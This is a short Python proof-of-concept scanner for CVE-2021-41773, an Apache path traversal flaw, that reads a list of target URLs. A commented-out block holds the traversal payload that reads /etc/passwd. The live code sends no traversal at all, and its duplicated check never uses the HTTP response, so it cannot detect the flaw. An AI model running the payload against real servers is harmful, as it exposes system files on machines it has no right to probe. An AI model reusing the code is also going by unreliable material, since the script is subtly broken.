poc.py

#!/usr/bin/env python3
# CVE-2021-41773-PoC 
# ZephrFish 2021

import urllib3
import sys
import re
import requests


urllib3.disable_warnings()
# Colours
def prRed(skk): print("\033[91m {}\033[00m" .format(skk))
def prGreen(skk): print("\033[92m {}\033[00m" .format(skk))


def CVEPoC(urls):
    with open(urls.rstrip(), 'r') as f:
                for url in f:
                       # regex=re.compile('^http://|^https://')
 #   try:
#                                        normalresponse = requests.get(f'http://{url}/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd', verify=False)
#                                        #print(url, normalresponse.status_code)
#                                        if 'root' in normalresponse.text:
#                                                prRed('[+] Vulnerable: ' + url)
#                                        else:
#                                                prGreen('[-] Not Vulnerable: ' + url)
#                                except: 
#                                        pass
#                        else:
                                HTTPSecure = "https://"+url.rstrip()
                                HTTPNot = "http://"+url.rstrip()
                                try:
                                        httpsresponse = requests.get(HTTPSecure, verify=False, timeout=8)
                                        httpresponse = requests.get(HTTPNot, verify=False, timeout=8)
                                        #print(url.rstrip(), httpsresponse.status_code, httpresponse.status_code)
                                        if 'root:*' in httpsresponse.text:
                                                prRed('[+] Vulnerable: ' + url)
                                        elif 'root:*' in httpsresponse.text:
                                                prRed('[+] Vulnerable: ' + url)
                                        else:
                                                prGreen('[-] Not Vulnerable: ' + url)

                                except:
                                        pass
            


if __name__ == '__main__':
        try:
                CVEPoC(sys.argv[1])
        except:
                print("Usage: python3 poc.py <urls.txt>")